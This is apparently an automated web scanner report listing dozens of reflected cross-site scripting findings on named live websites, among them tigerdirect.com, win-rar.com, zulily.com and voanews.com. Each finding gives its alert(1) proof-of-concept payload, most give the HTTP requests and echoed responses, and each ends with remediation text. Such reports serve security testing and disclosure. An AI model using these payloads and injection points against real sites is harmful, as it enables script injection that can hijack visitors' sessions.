The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c707a'-alert(1)-'805892914ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f0a9'-alert(1)-'5e2ee8acf95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9497f'-alert(1)-'cbe91a86368 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8a75'-alert(1)-'87f281d61ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42cc8'-alert(1)-'b4ca22a382e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 994ac'-alert(1)-'85e529bbe1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf90d'-alert(1)-'9266a2a23e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 562ae'-alert(1)-'040b828313e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b94'-alert(1)-'0069db6cb1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bfd8'-alert(1)-'ba7f15548b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25e2d'-alert(1)-'cd0cf84d869 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f66a'-alert(1)-'3ec72f2288e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82cb2'-alert(1)-'2f5e1b427b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51c9b'-alert(1)-'2d75c23b47b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.418. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.css [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a2e'-alert(1)-'1de2dab2528 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f787'-alert(1)-'ef6b2446d8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7494'-alert(1)-'68ed11db77c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9ea'-alert(1)-'0a284f6c62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.422. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/floatbox.js [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63488'-alert(1)-'17302e9ed49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6735c'-alert(1)-'03965d14717 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8aaf'-alert(1)-'89ee7162aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fa57'-alert(1)-'42be76e26c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.426. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbb57'-alert(1)-'a41769cc3f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 858a5'-alert(1)-'825233dafa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.428. http://www.rightnow.com/mobile.css [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/mobile.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1104'-alert(1)-'531515845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a583'-alert(1)-'4b76b1ad986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.430. http://www.rightnow.com/rightnow_secondary.css [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/rightnow_secondary.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30c8e'-alert(1)-'60cc89cbe95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8f17'-alert(1)-'bf6b026719f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.432. http://www.rightnow.com/search/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rightnow.com
Path:
/search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4626d'-alert(1)-'8e38a3c5ccd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff99"><script>alert(1)</script>6ad8c47ae16 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9c6"%3balert(1)//5a9f32949ac was submitted in the q parameter. This input was echoed as ae9c6";alert(1)//5a9f32949ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db774"style%3d"x%3aexpression(alert(1))"bad281a382 was submitted in the url parameter. This input was echoed as db774"style="x:expression(alert(1))"bad281a382 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ext/soc/x?url=db774"style%3d"x%3aexpression(alert(1))"bad281a382&text=Kts%2daf%2enet%20is%20delegated%20to%20four%20domain%20name%20servers%2c%20however%20one%20extra%20name%20server%20is%20listed%20in%20the%2e%2e%2e HTTP/1.1
Host: www.robtex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.robtex.com/dns/kts-af.net.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/html
ETag: c7c7aa7fa14334cde9a382a5f8428f47.gzip
Last-Modified: Wed, 28 Sep 2011 02:53:03 GMT
X-Debug: z0,fat0.x.robtex.com
Vary: Accept-Encoding
X-E-Original-Length: 1572
X-G-New-Length: 813
X-Rt: p24088 f3801
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Server: lighttpd/1.4.19
X-Cache: MISS from fat0x.x.robtex.com
X-Cache-Lookup: MISS from fat0x.x.robtex.com:80
Via: 1.1 fat0x.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 1572
Date: Wed, 28 Sep 2011 02:53:03 GMT
X-Varnish: 533750498
Age: 0
Via: 1.1 varnish
Connection: keep-alive
The value of the crypt request parameter is copied into the HTML document as plain text between tags. The payload 6a126<script>alert(1)</script>6682e1a2063 was submitted in the crypt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the dk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4fc2'%3balert(1)//9556241b89c was submitted in the dk parameter. This input was echoed as e4fc2';alert(1)//9556241b89c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the nightnum request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edd60'%3balert(1)//6933e5ef7f9 was submitted in the nightnum parameter. This input was echoed as edd60';alert(1)//6933e5ef7f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the nip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d8d5'%3balert(1)//49b5d938456 was submitted in the nip parameter. This input was echoed as 1d8d5';alert(1)//49b5d938456 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the propid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df56'%3balert(1)//0acb8136b5a was submitted in the propid parameter. This input was echoed as 2df56';alert(1)//0acb8136b5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6224b'%3balert(1)//5623fd652af was submitted in the rd parameter. This input was echoed as 6224b';alert(1)//5623fd652af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rddate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e40d'%3balert(1)//5af1c17b28d was submitted in the rddate parameter. This input was echoed as 9e40d';alert(1)//5af1c17b28d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wrnum request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45ea5'%3balert(1)//fab14a269ae was submitted in the wrnum parameter. This input was echoed as 45ea5';alert(1)//fab14a269ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c052"%20a%3db%2068ba09a4013 was submitted in the keywords parameter. This input was echoed as 5c052" a=b 68ba09a4013 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /applications/SearchTools/search.asp?keywords=MSKEY5c052"%20a%3db%2068ba09a4013 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1af10"%3balert(1)//e953487a67c was submitted in the keywords parameter. This input was echoed as 1af10";alert(1)//e953487a67c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /applications/SearchTools/search.asp?keywords=MSKEY1af10"%3balert(1)//e953487a67c HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="TigerDirect.com is your complete online headquarters for computer products
...[SNIP]...
<script language="Javascript">
function callbutton() {
var rs = "100200853.305725085";
var ud = "MSKEY1af10";alert(1)//e953487a67c";
var dt = new Date();
var tz = dt.getTimezoneOffset();
var sk = "eK3sVp9kJhCSx84kXas2Fka8skJCs3d02jdVAzpO23aKnFj23sk8UhGbbF3ksM4L";
var url = "http://tg6006.callbutton.net/bin/popup.cfm?sk=
...[SNIP]...
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e12'%3b6fcf19a131 was submitted in the keywords parameter. This input was echoed as 45e12';6fcf19a131 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /applications/SearchTools/search.asp?keywords=MSKEY45e12'%3b6fcf19a131 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.447. http://www.tigerdirect.com/applications/SearchTools/search.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tigerdirect.com
Path: /applications/SearchTools/search.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eedf6'%3balert(1)//256935e2024 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eedf6';alert(1)//256935e2024 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /applications/SearchTools/search.asp?keywords=MSKEY&eedf6'%3balert(1)//256935e2024=1 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the srkey request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98fed'%3balert(1)//5682d04a4e0 was submitted in the srkey parameter. This input was echoed as 98fed';alert(1)//5682d04a4e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /go/windows-7/?srkey=windows98fed'%3balert(1)//5682d04a4e0 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.449. http://www.voanews.com/english/news/middle-east/Analysts-Question-Merit-of-Palestinian-UN-Bid--130650528.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e293a"><script>alert(1)</script>b746f85ab2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /english/news/middle-east/Analysts-Question-Merit-of-Palestinian-UN-Bid--130650528.html?e293a"><script>alert(1)</script>b746f85ab2f=1 HTTP/1.1
Host: www.voanews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the dl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 864b6"><script>alert(1)</script>74fbd2b6f55 was submitted in the dl parameter. This input was echoed as 864b6\"><script>alert(1)</script>74fbd2b6f55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www. ...[SNIP]...
<a id="downloadlink" href="index.php?id=postdownload&dl=/rar/wrar401.exe864b6\"><script>alert(1)</script>74fbd2b6f55"> ...[SNIP]...
1.451. http://www.win-rar.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.win-rar.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b15"><script>alert(1)</script>60364650746 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44b15\"><script>alert(1)</script>60364650746 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www. ...[SNIP]...
<a id="downloadlink" href="index.php?id=postdownload&dl=/rar/wrar401/44b15\"><script>alert(1)</script>60364650746.exe"> ...[SNIP]...
1.452. https://www.zulily.com/index.php/customer/account/create/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.zulily.com
Path: /index.php/customer/account/create/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7bf89--><script>alert(1)</script>39129dcf067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php/customer/account/create/?7bf89--><script>alert(1)</script>39129dcf067=1 HTTP/1.1
Host: www.zulily.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: frontend=t37t9tbsags6oa45ga0pge1hs1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6a75"-alert(1)-"f36fff604b2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a6a75"-alert(1)-"f36fff604b2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=25D78024A8C0896A610C036D53493825; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:33 GMT
Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee0e0"-alert(1)-"af928c507e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
